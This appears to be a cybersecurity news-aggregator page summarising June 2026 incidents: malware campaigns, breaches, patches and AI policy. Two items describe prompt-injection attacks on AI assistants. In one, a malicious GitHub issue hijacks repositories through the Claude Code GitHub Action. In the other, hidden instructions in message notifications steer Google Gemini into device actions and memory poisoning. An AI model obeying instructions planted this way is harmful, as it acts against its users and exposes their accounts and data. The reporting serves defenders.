Social Engineering & PhishingMalwareScams & FraudTechnology & SoftwareCryptocurrency & BlockchainConsumers & General PublicMicrosoft
Attackers are tricking people looking for popular PC utilities into installing malware that secretly uses their graphics cards to mine cryptocurrency. Microsoft says the campaign uses search-engine optimization (SEO) poisoning and, in some cases, attacker-controlled links surfaced in AI chatbot responses for tools such as CrystalDiskInfo, HWMonitor, FurMark, K-Lite Codec Pack, PDFgear, and Display Driver Uninstaller. The fake downloads bundle a legitimate program with a malicious dynamic-link library (DLL), install ScreenConnect for remote access, add multiple Windows persistence mechanisms, evade Microsoft Defender, and then deploy GPU miners including gminer, lolMiner, and SRBMiner-MULTI.
Why it matters: This campaign targets owners of powerful Windows systems and can leave victims with both hijacked hardware and a remote-access backdoor for follow-on attacks. Users and defenders should avoid downloading software from AI-generated or unfamiliar links, verify vendor domains, and hunt for the listed indicators of compromise and unauthorized ScreenConnect installs.
Sources
SecurityWeek News 2026.06.05 91%
It summarizes Microsoft’s findings that attackers are abusing both SEO poisoning and AI chatbot recommendations to deliver fake utilities, then using ScreenConnect and process hollowing to deploy GPU-focused cryptominers.
Ionut Ilascu 2026.05.27 100%
This article establishes a distinct Microsoft-documented malware campaign centered on SEO poisoning and AI chatbot link manipulation to deliver GPU-mining malware and persistent remote access.
Full page
Sophos says ransomware operator used AI agents from Cursor and Claude to build EDR-evasion and Active Directory attack tools
5D ago 2 sources
MalwareThreat Actors & APTsRansomware
Sophos says it found a ransomware attack toolkit in a customer environment that was built with help from AI coding agents and used to hide from security software and map a victim's Windows network. The framework included Cobalt Strike traffic-masking profiles, Telegram-based command and control, a Cloudflare Worker redirector, and Python tools that generated Rust and Go payloads for evasion and execution. Sophos found operator logs referencing a ransom note and organizations listed on a ransomware leak site, indicating criminal use rather than legitimate red-team testing.
Why it matters: This shows AI tools are being used to speed up real ransomware tradecraft, especially defense evasion and internal network discovery. Defenders should review detections for Telegram and Cloudflare-backed command channels, unusual payload loaders, and suspicious Active Directory reconnaissance, and treat AI-assisted malware development as an operational threat rather than a theory.
Sources
SecurityWeek News 2026.06.05 62%
It adds reporting on Microsoft’s tracking of Storm-2697 and The Gentlemen ransomware-as-a-service, including the Go-based encryptor’s self-propagation via scheduled tasks with SYSTEM privileges.
Bill Toulas 2026.06.02 100%
This article appears to be the first tracked report establishing this specific Sophos-documented ransomware toolkit and its AI-assisted development workflow.
Full page
Hola Browser for Windows supply-chain compromise delivered a Monero cryptominer to some users
5D ago 2 sources
MalwareSupply ChainTechnology & SoftwareConsumers & General PublicCryptocurrency & BlockchainHolaMicrosoft
Hola says its Windows browser installer was compromised and, in some cases, delivered hidden mining malware to users. AppEsteem certification checks and analysis by Sophos found an undeclared executable, 'me.exe,' installed under the Hola program folder; the binary was unsigned, obfuscated, added a Microsoft Defender exclusion, copied itself as 'HolaMonitorService.exe,' created the 'hola_monitor_svc' Windows service for persistence, and appeared to mine Monero when the PC was idle. Hola said about 0.1% of users were affected and that it rebuilt its distribution pipeline after separately confirming the compromise with Sygnia.
Why it matters: People who installed Hola Browser on Windows may have unknowingly run malware that abuses their computer for cryptocurrency mining and weakens local defenses. Affected users and admins should treat this as urgent: verify installations, look for the named files and service, remove Hola if necessary, and reinstall only from a trusted, verified build.
Sources
SecurityWeek News 2026.06.05 69%
The roundup explicitly notes the Hola Browser miner bundling as one of the week’s notable items, reinforcing that compromise as a tracked security event.
Bill Toulas 2026.06.04 100%
This article establishes a distinct supply-chain attack on Hola Browser for Windows, including malware behavior, limited scope claims, and vendor confirmation of the compromise.
Full page
UN World Food Programme investigates breach of Gaza aid registration system exposing data on about 600,000 households
5D ago 2 sources
Breaches & Data LeaksSurveillance & PrivacyNonprofits & NGOsConsumers & General PublicWorld Food Programme
The U.N. World Food Programme says attackers accessed personal data submitted by Palestinians seeking food and cash assistance in Gaza. The incident affected the agency's Self-Registration Application used only in Palestine and exposed names, identification numbers, phone numbers, and neighborhood location details; WFP said the breach occurred on May 14, shut down the platform, and is still investigating how the intrusion happened and whether data was further leaked.
Why it matters: This is not just a privacy breach: exposed aid-recipient data in a war zone can put vulnerable civilians at real physical risk. People who registered for assistance may need to watch for phishing, impersonation, or other misuse of their personal details, while aid organizations should review exposure risks and incident response urgently.
Sources
2026.06.05 99%
This is the same underlying incident: the breach of WFP's Gaza self-registration application. The article adds reporting on the public Telegram notices, confirms the exposed data types included names, ID numbers, phone numbers, and location data, notes the platform was suspended for security improvements, and cites reporting that WFP detected the attack on May 14 after a prior warning about vulnerabilities.
2026.06.04 100%
This article establishes a new tracked story by identifying a distinct breach at the World Food Programme's Gaza self-registration platform, including the affected system, exposed data types, and reported scale of about 600,000 households.
Full page
DentaQuest breach exposed personal and health-insurance data for about 2.6 million accounts after ShinyHunters leak
5D ago 2 sources
Breaches & Data LeaksHealthcareInsuranceConsumers & General PublicDentaQuest
DentaQuest says hackers accessed part of its network, and leaked data reviewed by Have I Been Pwned indicates about 2.6 million accounts were exposed. The company was listed by the ShinyHunters extortion group, which claimed to have stolen more than 234 GB of data and later leaked it publicly; exposed fields reportedly include email addresses, full names, phone numbers, dates of birth, gender, government-issued IDs, and health-insurance information.
Why it matters: This is a major breach affecting customers of one of the largest U.S. dental benefits administrators, and the exposed identity and insurance data can fuel phishing, impersonation, and fraud. Affected people should watch for breach notices, be wary of calls or emails claiming to be from insurers or providers, and monitor accounts and insurance activity.
Sources
Ionut Arghire 2026.06.05 99%
This article covers the same DentaQuest/ShinyHunters breach and adds that SecurityWeek reported the leak size at 234 GB, that DentaQuest confirmed unauthorized access to a limited portion of its network, and reiterates the affected data types and approximate 2.6 million account count from Have I Been Pwned.
Bill Toulas 2026.06.04 100%
This article establishes a distinct breach event: DentaQuest confirmed unauthorized network access, and external analysis tied the public leak to 2.6 million exposed records.
Full page
Google Chrome 149 security update fixes 429 vulnerabilities, including critical ANGLE and Network bugs
5D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogle
Google released Chrome 149 with fixes for 429 security vulnerabilities, a record-sized browser security update that affects users on Windows, macOS, and Linux. The most severe issue is CVE-2026-10881, a CVSS 9.6 out-of-bounds read/write flaw in the ANGLE graphics engine that could let a remote attacker use a crafted HTML page to escape Chrome’s sandbox and potentially run code on the operating system. Google also fixed critical flaws CVE-2026-10882 in Network and CVE-2026-10883 in ANGLE in versions 149.0.7827.53 for Linux and 149.0.7827.53/54 for Windows and macOS.
Why it matters: Chrome is widely used, so a large set of browser bugs with multiple critical issues can put many users and organizations at risk from malicious websites. Users and administrators should update Chrome promptly across all devices and managed fleets.
Sources
Ionut Arghire 2026.06.05 100%
This article establishes a new tracked story because it covers a distinct Chrome 149 security release, not the previously tracked Chrome 148 update.
Full page
White House AI executive order sets 30-day voluntary review window and creates federal AI cybersecurity clearinghouse
5D ago 5 sources
Policy & RegulationGovernmentTechnology & SoftwareWhite HouseCISAOffice of Management and BudgetTreasuryOffice of the National Cyber Director
The White House issued a new artificial intelligence executive order that shortens the voluntary federal review period for certain advanced AI models to 30 days after public release and launches an AI cybersecurity clearinghouse. The order says access to designated "covered frontier" models should include confidentiality, cybersecurity, insider-risk, and intellectual-property safeguards, and directs Treasury, the Office of the National Cyber Director, the Cybersecurity and Infrastructure Security Agency, and the Office of Management and Budget to coordinate AI-based vulnerability detection and patch-prioritization efforts.
Why it matters: This matters because it shapes how the U.S. government and major AI companies will handle powerful models that could help find software flaws or affect critical infrastructure security. Organizations that rely on federal guidance, grants, or critical infrastructure partnerships should watch for implementation details and any new reporting, testing, or collaboration expectations.
Sources
SecurityWeek News 2026.06.05 95%
This article is direct follow-up coverage of the same executive order, adding industry reaction and criticism about the order's voluntary structure, likely adoption gaps, and how its benchmarking and clearinghouse provisions may affect AI developers and smaller critical-infrastructure operators.
2026.06.04 41%
The piece provides follow-on implementation detail for the same executive-order rollout, noting that CISA is named as a key agency under the order and is expected to issue a binding operational directive by Friday.
2026.06.04 88%
This article adds implementation details to the same executive-order event, reporting that CISA plans to release a binding operational directive for federal agencies this week and that the directive will cover vulnerability alleviation, vulnerability management, and rollout of AI access to partners.
Associated Press 2026.06.02 96%
This article appears to cover the same executive order, adding that Trump signed it after delaying a prior ceremony, that the review is framed as voluntary for frontier labs, that the NSA director will have a key role in determining which models are reviewed and which trusted partners get access, and that the White House says the process is meant to help secure critical infrastructure and government cyber defenses.
2026.06.02 100%
This article is the announcement of the executive order itself, establishing a new policy story rather than updating a previously tracked specific event.
Full page
City of York Council email error exposed hundreds of Blue Badge holders and revealed their disability status
5D ago 1 sources
Breaches & Data LeaksSurveillance & PrivacyGovernmentConsumers & General PublicCity of York CouncilInformation Commissioner's Office
City of York Council accidentally exposed the email addresses of hundreds of Blue Badge holders by sending messages without using blind carbon copy (BCC). Because the list was for Blue Badge-related communications, recipients could also infer that others on the list were disabled or had mobility impairments, making the breach especially sensitive. The council said it triggered its breach procedures, warned recipients to watch for suspicious messages, and the UK Information Commissioner's Office said it received a breach report and closed the case with advice.
Why it matters: This is a meaningful privacy breach because it exposed not just contact details but sensitive status information about disabled residents. Affected people should be alert for phishing or harassment, and public-sector organizations should review bulk-email controls and handling of special-category personal data.
Sources
2026.06.05 100%
This article establishes a distinct local-government data breach event involving City of York Council's mistaken disclosure of Blue Badge holders' email addresses and inferred disability status.
Full page
Five Eyes warn China is using LinkedIn, Indeed and Upwork to recruit people with access to state secrets
5D ago 3 sources
Social Engineering & PhishingThreat Actors & APTsGovernmentDefense & AerospaceTechnology & SoftwareLegal & Professional ServicesCryptocurrency & BlockchainMI5LinkedInIndeedUpworkPayPalWestern Union
MI5 and allied intelligence agencies warned that Chinese intelligence officers and their proxies are using job and networking platforms including LinkedIn, Indeed, and Upwork to spot and cultivate people with access to classified or otherwise sensitive government information. The advisory says the operators pose as recruiters, consultancies, think tanks, or research clients, rank applicants by likely access, request trial reports, then move conversations to encrypted messaging and pay through services such as PayPal, Zelle, Wise, Western Union, or cryptocurrency in exchange for non-public information.
Why it matters: This is a real-world espionage and social-engineering threat aimed at government, defense, foreign-affairs, academic, media, and policy workers. People in or near sensitive roles should treat unsolicited research, consulting, or recruiter outreach on these platforms as potentially hostile, report suspicious contact, and avoid sharing resumes or non-public work details casually.
Sources
Ionut Arghire 2026.06.05 98%
This article is a direct report on the same Five Eyes alert, adding detail on the fake recruiter workflow: impersonated think tanks and HR firms, ranking resumes by likely access, trial reports on defense and trade topics, escalation to requests for privileged information, movement to encrypted messaging, and payment methods including PayPal, Wise, Western Union, and cryptocurrency.
2026.06.04 98%
This article is another report on the same Five Eyes joint bulletin, adding details that Chinese intelligence officers pose as recruiters or consultants for front companies, shift targets from direct LinkedIn outreach to job-ad responses, screen applicants through interviews and trial reports, then move conversations to encrypted messaging apps and pay for increasingly sensitive information.
2026.06.04 100%
The article centers on a newly published MI5/Five Eyes advisory describing the current recruitment tradecraft, platforms used, target groups, and payment methods in China's state-secrets collection campaign.
Full page
RCI Hospitality says breach tied to web-server access flaw exposed data on about 40,000 people
5D ago 1 sources
Breaches & Data LeaksHospitality & TravelConsumers & General PublicTechnology & SoftwareRCI HospitalityRCI Internet ServicesMicrosoft
RCI Hospitality says a cyberattack exposed sensitive personal data belonging to roughly 40,000 people. The company previously disclosed that its RCI Internet Services subsidiary found an insecure direct object reference, or IDOR, flaw on an IIS web server on March 23 that allowed unauthorized access to personal information, and it later determined files were stolen. Exposed data included names, contact details, dates of birth, Social Security numbers, and driver’s license numbers.
Why it matters: People affected face a real risk of identity theft because the stolen files included high-value personal data. Organizations should review web applications for IDOR-style authorization flaws, and affected individuals should watch for fraud and consider credit monitoring or freezes.
Sources
Eduard Kovacs 2026.06.05 100%
This article appears to be the first clear impact update establishing the RCI Hospitality breach as a trackable story, adding the concrete figure of roughly 40,000 affected individuals and confirming file theft.
Full page
Apple removes Russia’s state-backed Max messaging app from the App Store
5D ago 1 sources
Information FreedomSurveillance & PrivacyCensorshipGovernmentTechnology & SoftwareConsumers & General PublicAppleVK
Apple removed Russia’s state-backed Max messaging app from the App Store, cutting off new iPhone and iPad downloads and updates for existing users. Apple told BBC Russia the removal was done to comply with sanctions regulations, while Russian officials said about 20 million users lost access through Apple’s marketplace. Max, developed by VK and promoted by the Russian state as a Telegram and WhatsApp alternative, is deeply integrated with government services, digital ID, e-signatures, and payments; critics warn its lack of end-to-end encryption could make user communications easier for authorities to monitor.
Why it matters: This affects Russian users who rely on Max and highlights how app-store controls, sanctions, and state-backed platforms can shape access to communication tools. It also matters for privacy watchers because Max is closely tied to government infrastructure, so users should weigh surveillance risks and loss of updates if they continue using it.
Sources
2026.06.04 100%
This article establishes a new story about Apple’s removal of the Max app as a distinct platform-access and privacy event, not the same underlying event as any listed tracked story.
Full page
Pink extortion group uses fake help-desk calls and MFA phishing to steal Microsoft 365 and cloud data
5D ago 1 sources
Social Engineering & PhishingScams & FraudThreat Actors & APTsBreaches & Data LeaksMicrosoft
A newly identified extortion group called Pink is calling employees while pretending to be IT support, then stealing account credentials and company data to demand payment. Palo Alto Networks Unit 42 says the group, tracked as CL-CRI-1147 and likely linked to the criminal network known as The Com, uses voice phishing and fake help-desk interactions to capture passwords and multifactor authentication (MFA) approvals, then raids services such as SharePoint, OneDrive, and Microsoft Teams. Unit 42 said Pink's leak site went live on May 31 and published domains and IP addresses tied to the campaign as indicators of compromise.
Why it matters: This matters to organizations that rely on cloud productivity tools because attackers do not need malware or software flaws if they can talk staff into handing over access. Companies should warn staff about unsolicited help-desk calls, tighten help-desk identity checks, review Microsoft 365 logs, and block or investigate the listed phishing infrastructure immediately.
Sources
2026.06.04 100%
The article establishes a distinct new threat story: a newly branded extortion cluster, Pink, with a named leak site, tradecraft, likely affiliation, and concrete indicators of compromise.
Full page
Magecart campaign uses Google Tag Manager and Stripe API to steal payment cards from Magento checkout pages
6D ago 1 sources
Scams & FraudSocial Engineering & PhishingMalwareRetail & E-CommerceConsumers & General PublicTechnology & SoftwareMagentoAdobeGoogleStripe
Researchers say a new Magecart card-skimming campaign is stealing shoppers’ payment details from compromised online stores and hiding both its malware and stolen data inside trusted Google Tag Manager and Stripe services. Sansec says the skimmer targets Magento and Adobe Commerce checkout pages, pulls JavaScript from a Google Tag Manager container, retrieves payload code from Stripe customer metadata tied to customer ID cus_TfFjAAZQNOYENR, and exfiltrates stolen card, billing, email, and phone data by creating fake Stripe customer records; a variant uses Google Firestore instead of Stripe. The Stripe record was reportedly created on December 24, 2025, suggesting the campaign may have been active for months.
Why it matters: This matters because stores may allow traffic to Google Tag Manager and Stripe by default, letting the skimmer blend in and evade common security controls while stealing card data from real customers. Online retailers using Magento or Adobe Commerce should urgently inspect GTM containers, Stripe API activity, and checkout-page scripts for unauthorized changes.
Sources
Bill Toulas 2026.06.04 100%
This article appears to be the initial report on a distinct Magecart payment-card theft campaign that abuses Stripe and Google Tag Manager as trusted infrastructure, not an update to an existing tracked story.
Full page
DHS says it will reshape CISA as workforce and budget cuts raise concerns about U.S. cyber defense capacity
6D ago 2 sources
Policy & RegulationGovernmentCISADHSTreasury Department
The Homeland Security secretary said the Trump administration plans to refocus and rebuild CISA even as the agency has lost roughly a third of its staff and faces proposed budget cuts. Secretary Markwayne Mullin told lawmakers CISA now has about 2,200 personnel and likely needs about 2,800, while the White House's fiscal 2027 budget would cut more than $700 million. He also signaled a new nominee to lead CISA and defended assigning Treasury a lead role in an AI vulnerability clearinghouse created by the new executive order.
Why it matters: CISA is the main federal agency that helps defend civilian networks, coordinate with private companies, and warn about major cyber risks, so sharp cuts or mission changes can affect incident response and national cyber preparedness. This matters to defenders, state and local governments, and the public because it signals potential changes in federal cyber support, vulnerability handling, and long-term staffing capacity.
Sources
2026.06.04 84%
This article adds concrete new information to that same broader CISA restructuring event: the Trump administration is considering Palantir CTO Shyam Sankar to fill the long-vacant CISA director role, while DHS says a nomination is imminent and CISA is being tasked with implementing the new AI executive order.
2026.06.03 100%
This article establishes a distinct policy story centered on DHS's stated plan to reshape CISA amid staffing losses, budget reductions, and pending leadership changes, rather than a specific breach or vulnerability event already tracked.
Full page
FTC considers changing or dropping privacy order against X over Twitter’s use of 2FA phone numbers and emails for ads
6D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareMedia & EntertainmentConsumers & General PublicFTCXTwitter
The U.S. Federal Trade Commission is considering whether to modify or set aside a 2022 privacy order against X, formerly Twitter, over the company’s use of account security data for targeted advertising. The original order followed FTC allegations that Twitter collected phone numbers and email addresses for account security, including two-factor authentication (2FA), then used that data for ads in violation of a 2011 privacy order; the case involved more than 140 million users and a $150 million penalty. The FTC has opened a public comment period through July 2, 2026.
Why it matters: This matters to X users because it concerns whether protections imposed after a major misuse of security-related personal data will remain in force. It also matters more broadly because weakening the order could signal reduced privacy enforcement around companies that repurpose security data for advertising.
Sources
2026.06.04 100%
The article establishes a fresh regulatory development: the FTC is actively reconsidering an existing privacy enforcement order against X/Twitter, with potential consequences for user data protections and future privacy enforcement.
Full page
Russia moves to label Belarusian Cyber Partisans and Silent Crow as extremist groups after anti-Kremlin cyberattacks
6D ago 1 sources
Information FreedomCensorshipPolicy & RegulationThreat Actors & APTsGovernmentTransportation & LogisticsAeroflotRussia Supreme Court
Russia is asking its Supreme Court to ban Belarusian Cyber Partisans and Silent Crow as extremist organizations, a designation that can outlaw their activities, block their websites and channels, and expose associates to criminal penalties. The move follows the groups' claimed attacks on Russian and Belarusian government and infrastructure targets, including the July 2025 Aeroflot disruption that canceled more than 100 flights and allegedly involved data theft and destruction of airline IT systems. No CVE or software flaw is cited; this is a state action tied to politically motivated hacking and online speech.
Why it matters: This matters because Russia is using an extremism label against online groups tied to cyber operations, which can expand censorship and criminalize access to related information channels. People following these groups, especially in Russia, may face blocking or legal risk, while defenders and researchers should watch for knock-on effects on threat visibility and attribution.
Sources
2026.06.04 100%
The article establishes a distinct new story: a formal Russian legal effort to classify two named anti-Kremlin hacking groups as extremist organizations, rather than reporting a previously tracked breach, vulnerability, or malware event.
Full page
U.S. Supreme Court upholds FCC fines against AT&T, Verizon and T-Mobile over sharing customers’ phone location data
6D ago 1 sources
Surveillance & PrivacyPolicy & RegulationTelecommunicationsGovernmentConsumers & General PublicAT&TVerizonT-MobileSprintFCCU.S. Supreme Court
The U.S. Supreme Court ruled that the FCC lawfully fined major wireless carriers for sharing access to customers’ location data without proper consent. In an 8-1 decision, the Court said the FCC’s forfeiture process did not violate the companies’ jury-trial rights, leaving in place penalties of roughly $47 million for Verizon, $57 million for AT&T, and $92 million for T-Mobile and Sprint. The underlying FCC case alleged the carriers sold location access to aggregators and data brokers and failed to take reasonable steps to protect that sensitive data.
Why it matters: This matters because it reinforces that mobile carriers can be punished for letting precise location data flow to third parties without meaningful consent. It is important for users concerned about surveillance and for companies handling sensitive data, even though there is no immediate patch or user action beyond reviewing privacy choices and carrier practices.
Sources
2026.06.04 100%
This article establishes a new trackable story because it is a fresh Supreme Court ruling that definitively upholds the FCC’s enforcement action over telecom location-data sharing, rather than an update to any existing tracked item.
Full page
Cisco patches Cisco Unified CM flaw CVE-2026-20230 that could lead to root access, warns public PoC exists
6D ago 3 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareTelecommunicationsCisco
Cisco released fixes for a serious security flaw in Cisco Unified Communications Manager and Unified Communications Manager Session Management Edition that could let remote attackers gain a path to full control of affected appliances. The bug, CVE-2026-20230, is a server-side request forgery issue caused by improper validation of certain HTTP requests; on systems with the WebDialer service enabled, an unauthenticated attacker can send crafted requests to write files to the underlying operating system and potentially escalate to root. Cisco fixed it in Unified CM and Unified CM SME 14SU6 and plans to include fixes in 15SU5.
Why it matters: Organizations running affected Cisco call-management systems should check whether WebDialer is enabled and apply updates quickly, especially because proof-of-concept exploit code is already public. Even without confirmed in-the-wild exploitation, the flaw could give attackers a foothold that leads to full device compromise.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 99%
The article appears to cover the same underlying event: Cisco’s patch release for CVE-2026-20230 in Unified Communications Manager and the fact that proof-of-concept exploit code is publicly available.
Sergiu Gatlan 2026.06.04 99%
This article is the same underlying event: Cisco's disclosure and patching of CVE-2026-20230 in Unified CM, including that public PoC exploit code exists, the flaw affects systems with WebDialer enabled, and admins can disable WebDialer until updating to fixed releases.
Ionut Arghire 2026.06.04 100%
This article establishes a new tracked story by disclosing Cisco's patch release and warning about public exploit code for CVE-2026-20230 in Unified CM/Unified CM SME; it is distinct from the existing Cisco Secure Workload story, which concerns a different product and CVE.
Full page
IronWorm malware backdoors 36 npm packages to steal cloud, AI, and developer credentials
6D ago 1 sources
Supply ChainMalwareTechnology & SoftwareCryptocurrency & BlockchainnpmOpenAIAnthropicAWS
Attackers uploaded 36 malicious npm packages carrying a new malware strain called IronWorm, putting developers and continuous integration systems at risk if they installed the poisoned versions. JFrog says the Rust-based malware steals 86 environment variables and 20 credential-file types, including AWS, OpenAI, Anthropic, npm, SSH, vault, and crypto-wallet data; it was first linked to the compromised npm account 'asteroiddao' and can self-propagate by abusing stolen npm publishing and Trusted Publishing secrets to push trojanized package updates.
Why it matters: This can spread from one compromised developer or build system into many other packages and organizations, making it a high-priority software supply-chain threat. Developers and defenders should identify any affected package versions, upgrade to clean releases, rotate exposed credentials, review GitHub Actions and npm publishing tokens, and enforce two-factor authentication.
Sources
Bill Toulas 2026.06.04 100%
The article establishes a distinct npm supply-chain incident centered on the newly identified IronWorm malware and a specific set of 36 compromised packages, rather than merely revisiting the earlier Shai-Hulud or other npm package hijacking events.
Full page
Claude Code GitHub Action flaw let a malicious GitHub issue take over repositories running the workflow
6D ago 1 sources
Supply ChainZero-Days & CVEsTechnology & SoftwareAnthropicGitHub
A flaw in Anthropic's Claude Code GitHub Action could let an attacker use one malicious GitHub issue or comment to hijack affected repositories. The issue affected the GitHub Action integration for Claude Code, where untrusted issue content could be turned into dangerous workflow commands and expose repository secrets or enable unauthorized code changes in automation runs; the article does not provide a CVE in the supplied text.
Why it matters: Projects using the Claude Code GitHub Action may have been exposed to repository takeover through normal issue-tracker interactions, making this a high-priority supply-chain and automation risk. Maintainers should review Anthropic's fix guidance, restrict workflow permissions, rotate exposed secrets, and treat issue-triggered automation as untrusted until patched.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 100%
This article appears to establish a distinct newly disclosed vulnerability in Anthropic's Claude Code GitHub Action, not the previously tracked Claude Code sandbox bypass or the broader SymJack agent-manipulation research.
Full page
Google patched Gemini voice assistant flaw that let messaging notifications inject hidden commands
6D ago 1 sources
Zero-Days & CVEsSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicGoogleWhatsAppSlackZoom
Researchers say attackers could have manipulated Google’s Gemini voice assistant through ordinary message notifications from apps such as WhatsApp, Slack, and SMS. SafeBreach calls the technique “Fake Context Alignment”: hidden instructions embedded in notification content were silently pulled into Gemini’s context when users asked it to read messages aloud, potentially enabling actions such as controlling Google Home devices, starting Zoom calls, sending deceptive messages, and poisoning long-term memory. Google was notified in August 2025 and patched the issue in November 2025 with content-classifier changes.
Why it matters: This matters because it shows how everyday messages could be turned into a hands-free attack path against AI assistants that are connected to calls, messages, and smart-home controls. Users and organizations relying on Gemini should make sure current protections are in place and treat unsolicited messages as a potential trigger for AI-assisted actions.
Sources
Eduard Kovacs 2026.06.04 100%
This article establishes a distinct security story about a notification-based indirect prompt injection flaw in Google Gemini, separate from existing tracked stories about ChatGPT prompt injection, Gemini API key exposure, or other AI model security issues.
Full page
Proofpoint says TA4922 is targeting European organizations with new Atlas RAT malware and phishing lures
6D ago 3 sources
Threat Actors & APTsMalwareScams & FraudSocial Engineering & PhishingMicrosoftWhatsAppLINE
A Chinese-speaking cybercrime group is using new malware and localized phishing messages to break into organizations in Europe and beyond. Proofpoint says TA4922, linked to activity overlaps with Silver Fox and Void Arachne, has targeted entities in Germany, Italy, the United Kingdom, South Africa, and parts of Southeast Asia since March 2026 using payroll, tax, VAT, invoice, and HR lures sent by email and messaging apps including WhatsApp, LINE, and Microsoft Teams. The campaigns deploy Atlas RAT, RomulusLoader, SilentRunLoader, and Winos4.0/ValleyRAT for remote access, file theft, credential theft, keylogging, screenshots, and webcam or audio capture.
Why it matters: Organizations in the targeted regions should treat this as an active intrusion and phishing threat, especially finance, HR, and compliance teams that may receive convincing local-language messages. Defenders should hunt for the named malware families and remote-management tools, tighten phishing controls, and warn staff to verify unexpected payroll, tax, invoice, or compliance messages across email and chat platforms.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 96%
This appears to be the same underlying Proofpoint-reported TA4922 campaign, adding that the China-linked actor has expanded phishing targeting to the UK, Germany, Italy, and South Africa and continuing use of Atlas RAT with localized lures.
Ionut Arghire 2026.06.04 97%
This article is a direct follow-up on the same TA4922 campaign cluster, adding that Proofpoint now views the actor as operating at the highest campaign tempo in its cybercrime tracking, expanding from Asia into the UK, Germany, Italy, South Africa, and using HR, payroll, invoicing, customer-service, and out-of-band messaging lures with Atlas RAT, RomulusLoader, SilentRunLoader, ValleyRAT, and RMM tools such as AnyDesk and SyncFuture.
Bill Toulas 2026.06.03 100%
This article appears to be the first tracked item establishing Proofpoint's reporting on TA4922's expanded European campaigns and its use of the newly identified Atlas RAT and related loaders.
Full page
CISA adds actively exploited Adobe Commerce and Magento remote-code-execution flaw CVE-2026-45247 to KEV catalog
6D ago 2 sources
Urgent PatchesZero-Days & CVEsRetail & E-CommerceGovernmentTechnology & SoftwareAdobeCISAMagento
CISA says attackers are exploiting a serious Adobe Commerce and Magento flaw that can let them take over vulnerable online store servers. The issue, CVE-2026-45247, is a remote-code-execution vulnerability, meaning an attacker can run their own commands on the target system from afar; CISA added it to the Known Exploited Vulnerabilities catalog, which federal agencies use to prioritize urgent fixes. Affected product and version details would follow Adobe’s advisory, and internet-exposed commerce systems are the most immediate concern.
Why it matters: Organizations running Adobe Commerce or Magento should treat this as urgent because CISA only adds bugs to KEV when there is evidence of real-world exploitation. For online stores, the risk can include site takeover, payment-data exposure, and malware implantation, so defenders should identify affected instances and patch or mitigate immediately.
Sources
Ionut Arghire 2026.06.04 97%
This article is the same underlying event: active exploitation of CVE-2026-45247 and CISA adding it to KEV. It adds product-specific detail that the flaw is in the Mirasvit Full Page Cache Warmer extension, affects versions before 1.11.12, uses unsafe PHP object deserialization via the CacheWarmer cookie, and includes compromise indicators from Sansec.
info@thehackernews.com (The Hacker News) 2026.06.04 100%
This article appears to establish a new tracked event: CISA's KEV addition for CVE-2026-45247 in Adobe Commerce/Magento, and no existing story in the tracker covers this specific CVE or KEV action.
Full page
UK court orders former RAC workers to repay £118,000 after selling crash victims' personal data
6D ago 1 sources
Breaches & Data LeaksSurveillance & PrivacyPolicy & RegulationTransportation & LogisticsConsumers & General PublicRACInformation Commissioner's Office
Two former RAC employees in the UK were ordered to repay more than £118,000 after illegally selling personal data belonging to car crash victims. The Information Commissioner's Office said the pair were previously convicted under the Computer Misuse Act 1990 and Data Protection Act 2018 after about 29,500 records were copied from RAC systems and shared over WhatsApp with an unknown buyer; one defendant now faces 18 months in prison if she does not repay the proceeds within three months.
Why it matters: This matters because insiders abused access to sensitive data from people involved in road accidents, showing how personal information can be monetized after a breach from inside an organization. For defenders and regulated firms, it underscores the need for monitoring, least-privilege access, and rapid response to suspicious data exports.
Sources
2026.06.04 100%
The article establishes a trackable story by providing a substantive legal outcome in a real insider data-theft case involving RAC crash-victim records and the use of UK privacy and computer-misuse laws to recover criminal proceeds.
Full page
DOJ, Thai police and tech firms disrupt 1.4 million scam accounts tied to Southeast Asia fraud compounds
6D ago 1 sources
Scams & FraudPolicy & RegulationGovernmentTechnology & SoftwareTelecommunicationsCryptocurrency & BlockchainConsumers & General PublicDOJRoyal Thai PoliceAppleGoogleMetaMicrosoft
Law enforcement and major tech companies say they disrupted more than 1.4 million accounts and related infrastructure used by scam networks operating from Southeast Asia. The operation, called Disruption Week, involved the US Department of Justice, Royal Thai Police, and firms including Apple, Google, Meta, Microsoft, Coinbase, SpaceX, Silent Push, TRM Labs, and Zenlayer; it led to 63 arrests, the freezing of over $3.8 million in cryptocurrency, and takedowns of social-media accounts, Microsoft accounts, Starlink kits, servers, and malicious network infrastructure linked to fraud compounds in Cambodia, Laos, and Burma.
Why it matters: This matters because the operation targeted industrial-scale scam networks that steal money from victims worldwide and rely on mainstream platforms and connectivity to operate. Users should remain cautious of investment and impersonation scams, while defenders and platforms should watch for follow-on account rebuilds, infrastructure shifts, and related fraud activity.
Sources
Ionut Arghire 2026.06.04 100%
This article establishes a new tracked story around the named 'Disruption Week' crackdown and its specific cross-industry takedown of scam accounts, infrastructure, and crypto assets tied to Southeast Asian fraud compounds.
Full page
Espionage hackers spent 150 days inside a senior executive’s email at a major global stock exchange
6D ago 2 sources
MalwareThreat Actors & APTsBreaches & Data LeaksFinance & BankingMicrosoftDropbox
Hackers secretly monitored and stole email data from a senior executive at a major global stock exchange for about five months. Broadcom’s Symantec and Carbon Black teams said the intrusion began in October 2025 and lasted until March 2026, with malware on the victim’s device disguised as Adobe and OneDrive software, scheduled-task persistence masked as Adobe, Lenovo, and OneDrive services, and exfiltration of Outlook mailbox data in small archives via Dropbox and OneDrive. The initial access method and the victim exchange were not disclosed, but investigators published indicators of compromise.
Why it matters: This is a high-impact espionage case because a stock exchange executive’s mailbox can expose market-moving information, internal deliberations, contacts, and travel details. Financial institutions and other high-value targets should hunt for the published indicators, review executive mailbox and endpoint activity, and scrutinize cloud-storage exfiltration and suspicious scheduled tasks.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 99%
This article is another report on the same underlying incident: an espionage intrusion in which attackers maintained access to a senior executive’s Outlook mailbox at a major global stock exchange for roughly five months.
Eduard Kovacs 2026.06.03 100%
This article appears to be the first tracked report of this specific espionage intrusion against a global stock exchange executive mailbox.
Full page
